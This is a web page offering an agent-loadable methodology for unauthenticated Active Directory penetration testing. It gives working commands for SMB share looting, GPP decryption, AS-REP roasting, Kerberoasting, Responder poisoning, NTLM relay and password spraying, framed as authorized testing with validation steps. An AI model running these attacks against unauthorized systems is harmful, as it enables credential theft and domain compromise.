Skip to main content
Category: Pentest
Load this context Ask your agent: 
get the ad-pentest-unauthenticated context

Summary

An unauthenticated infrastructure pentest simulates an attacker with no credentials and no prior access, starting only from network reachability. The goal is to determine how far an attacker can get before obtaining any credentials, and whether AD misconfigurations allow privilege escalation from zero.
  • Phase 1–2 build a complete host and service map, identifying Domain Controllers via port fingerprinting
  • Phase 3–4 enumerate SMB shares via null and guest sessions, hunt for credentials in SYSVOL, GPP files, and accessible share contents
  • Phase 5 enumerates domain users, groups, and password policy without credentials via RPC null sessions and LDAP anonymous bind
  • Phase 6 performs AS-REP Roasting against accounts with Kerberos pre-auth disabled, producing offline-crackable hashes
  • Phase 7 performs Kerberoasting against SPN accounts using any credentials obtained in earlier phases
  • Phase 8 runs background attacks in parallel: Responder for NTLM hash capture, DNS zone transfer, NBT-NS enumeration
  • Phases 9–11 enforce a validation gate, false positive filter, and structured finding output

CONTEXT.md

When to Use This Context

Load this context when:
  • Starting a black-box or unauthenticated internal network pentest
  • The scope includes Active Directory and Windows infrastructure
  • No credentials have been provided (testing pre-auth attack surface)
  • Assessing SMB exposure, null sessions, and Kerberos pre-auth weaknesses
Key focus areas: host and port discovery, SMB null sessions, AD user enumeration, AS-REP Roasting, Kerberoasting, offline hash cracking. Out of scope for this context: post-exploitation, lateral movement after credential gain, authenticated enumeration beyond initial foothold. Typical flow: Discover → Enumerate SMB → Enumerate AD → Attack Kerberos → Crack → Report

Phase 1: Host Discovery

# ICMP sweep
nmap -sn -PE -T4 --min-parallelism 100 10.0.0.0/24 -oA discovery/ping_sweep

# ARP sweep (local subnet, requires root)
nmap -sn -PR 10.0.0.0/24 -oA discovery/arp_sweep

# TCP-based discovery (bypasses ICMP blocks)
nmap -sn -PS80,443,445,3389 10.0.0.0/24 -oA discovery/tcp_sweep

# Extract live hosts
grep "Up" discovery/ping_sweep.gnmap | awk '{print $2}' > live_hosts.txt

# OS fingerprinting
nmap -O --osscan-guess -iL live_hosts.txt -T4 -oA discovery/os_guess
Windows hosts often block ICMP but respond to TCP 445. Always combine methods.

Phase 2: Port and Service Enumeration

# Full TCP scan all 65535 ports
nmap -sS -p- -T4 --min-rate 5000 -iL live_hosts.txt -oA scans/full_tcp

# Version + script scan on open ports
nmap -sV -sC -p $(grep open scans/full_tcp.gnmap | grep -oP '\d+/open' | \
 cut -d/ -f1 | sort -u | tr '\n' ',') -iL live_hosts.txt -oA scans/services

# Extract hosts by service
grep "445/open" scans/full_tcp.gnmap | awk '{print $2}' > targets/smb_hosts.txt
grep "88/open"  scans/full_tcp.gnmap | awk '{print $2}' > targets/kerberos_hosts.txt
grep "389/open" scans/full_tcp.gnmap | awk '{print $2}' > targets/ldap_hosts.txt
grep "3389/open" scans/full_tcp.gnmap | awk '{print $2}' > targets/rdp_hosts.txt

# DC fingerprint (DCs expose all of: 53, 88, 389, 445, 3268)
nmap -p 53,88,389,445,3268 --open -iL live_hosts.txt -oA scans/dc_candidates

Phase 3: SMB Enumeration

# Test null session
nxc smb targets/smb_hosts.txt -u '' -p '' --shares 2>/dev/null | tee smb/null_shares.txt

# Test guest session
nxc smb targets/smb_hosts.txt -u 'guest' -p '' --shares 2>/dev/null | tee smb/guest_shares.txt

# Per-host smbclient check
while read ip; do
 echo "=== $ip ==="
 smbclient -N -L //$ip 2>/dev/null
done < targets/smb_hosts.txt | tee smb/smbclient_null.txt

# Access and download a readable share
smbclient -N //<IP>/ShareName -c 'prompt OFF; recurse ON; mget *' 2>/dev/null

# SYSVOL hunt for GPP cpassword values
smbclient -N //dc-ip/SYSVOL -c 'recurse ON; ls'
gpp-decrypt '<cpassword value>'
High-priority share names: SYSVOL, NETLOGON, backup, backups, it, admin, scripts, tools 
# Check for EternalBlue (MS17-010) detection only
nmap -p 445 --script smb-vuln-ms17-010 -iL targets/smb_hosts.txt

# Check SMB signing (required for relay attack assessment)
nxc smb targets/smb_hosts.txt --gen-relay-list smb/relay_candidates.txt

Phase 4: SMB Share Content Analysis

# Credential patterns
grep -riE "password\s*=|pwd\s*=|connectionstring" . 2>/dev/null
grep -riE "AKIA[0-9A-Z]{16}" . 2>/dev/null
grep -riE "-----BEGIN (RSA |EC |OPENSSH )?PRIVATE KEY-----" . 2>/dev/null

# PowerShell scripts
grep -iE "ConvertTo-SecureString|password|credential" **/*.ps1 2>/dev/null

# web.config ASP.NET connection strings
grep -i "connectionString\|password\|pwd" */web.config 2>/dev/null

Phase 5: AD Enumeration (Unauthenticated)

# enum4linux-ng (modern, best output)
enum4linux-ng -A <DC-IP> -oA enum4linux/dc_full

# rpcclient null session
rpcclient -U "" -N <DC-IP>
# inside: enumdomusers / enumdomgroups / getdompwinfo

# LDAP anonymous bind dump users
ldapsearch -x -H ldap://<DC-IP> \
 -b "DC=domain,DC=local" \
 "(objectClass=user)" sAMAccountName userPrincipalName memberOf \
 2>/dev/null | tee ldap/users_anon.txt

grep "sAMAccountName:" ldap/users_anon.txt | awk '{print $2}' > targets/userlist.txt

# Kerbrute validate usernames without lockout risk
kerbrute userenum --dc <DC-IP> -d domain.local \
 /usr/share/wordlists/usernames.txt -o kerbrute/valid_users.txt

Phase 6: AS-REP Roasting

# No credentials needed
GetNPUsers.py domain.local/ \
 -usersfile targets/userlist.txt \
 -no-pass -dc-ip <DC-IP> \
 -outputfile asrep/hashes.txt -format hashcat

# Crack offline hashcat mode 18200
hashcat -m 18200 asrep/hashes.txt /usr/share/wordlists/rockyou.txt \
 --rules-file /usr/share/hashcat/rules/best64.rule \
 -o asrep/cracked.txt
Accounts with DONT_REQUIRE_PREAUTH set in userAccountControl are vulnerable. Often misconfigured service accounts or legacy accounts.

Phase 7: Kerberoasting

Requires at least one valid domain credential (from SMB analysis, GPP decrypt, or AS-REP cracking). 
# Request TGS for all SPN accounts
GetUserSPNs.py domain.local/username:password \
 -dc-ip <DC-IP> -request \
 -outputfile kerberoast/tgs_hashes.txt

# Crack offline mode 13100 (RC4), 19600 (AES128), 19700 (AES256)
hashcat -m 13100 kerberoast/tgs_hashes.txt /usr/share/wordlists/rockyou.txt \
 --rules-file /usr/share/hashcat/rules/best64.rule \
 -o kerberoast/cracked.txt
AES256 (etype 18) hashes crack significantly slower than RC4 (etype 23).

Phase 8: Background and Supplementary Attacks

Responder NTLM Hash Capture

Start at engagement launch and leave running throughout. Peak capture windows: morning logon (08:00–09:30) and post-lunch (13:00–14:00). 
# Run in a tmux pane active poisoning
tmux new-session -d -s responder \
 "responder -I eth0 -wP 2>&1 | tee responder/logs/responder.log"

# Monitor captured hashes
tail -f /usr/share/responder/logs/SMB-NTLMv2-*.txt

# Crack NTLMv2 hashes mode 5600
hashcat -m 5600 responder/hashes/all_ntlmv2.txt /usr/share/wordlists/rockyou.txt \
 -o responder/cracked.txt
Relay instead of crack (if SMB signing is not required): 
# Disable SMB/HTTP in Responder.conf, then:
ntlmrelayx.py -tf smb/relay_candidates.txt -smb2support
Note: -d (DHCP poisoning) can disrupt the entire subnet. Confirm explicit client approval before using it.

Other Checks

# DNS zone transfer
dig axfr @<DC-IP> domain.local 2>/dev/null

# Password spray (check lockout policy first enum4linux -P)
nxc smb targets/smb_hosts.txt -u targets/userlist.txt \
 -p 'Winter2024!' --continue-on-success 2>/dev/null

Validation Gate

Before reporting any finding, confirm all of the following:
  • Reproduced in a clean session with no cached credentials
  • Null/guest session confirmed explicitly, not assumed from tool output
  • Cracked hashes verified by re-authenticating with the cracked credential
  • AS-REP / Kerberoast hashes are from accounts in scope
  • SMB file access confirmed by actually reading a file, not just listing the share
  • Impact articulated: what can an attacker specifically do with this finding?
  • Evidence captured: full command, output, timestamp, source IP

False Positive Filter

Do not report without further verification:
  • Share listed but not accessible: listing a share name is not the same as read access, always confirm by reading a file
  • EternalBlue flagged by Nmap but unconfirmed: the smb-vuln-ms17-010 script has false positive cases, confirm before reporting as exploitable
  • Hash captured but not cracked: an uncracked AS-REP or TGS hash is a misconfiguration finding, not a credential compromise
  • LDAP anonymous bind returning empty results: a successful bind with 0 results is not the same as useful enumeration
  • Password spray without confirmed lockout policy: do not spray without knowing the lockout threshold

web-app-pentest

Full web application pentest methodology, recon through reporting

cloud-audit

AWS, Azure, and GCP security audit, IAM, storage, networking, secrets, and logging

code-audit

Source code security review, secrets, auth logic, injection sinks, crypto, dependencies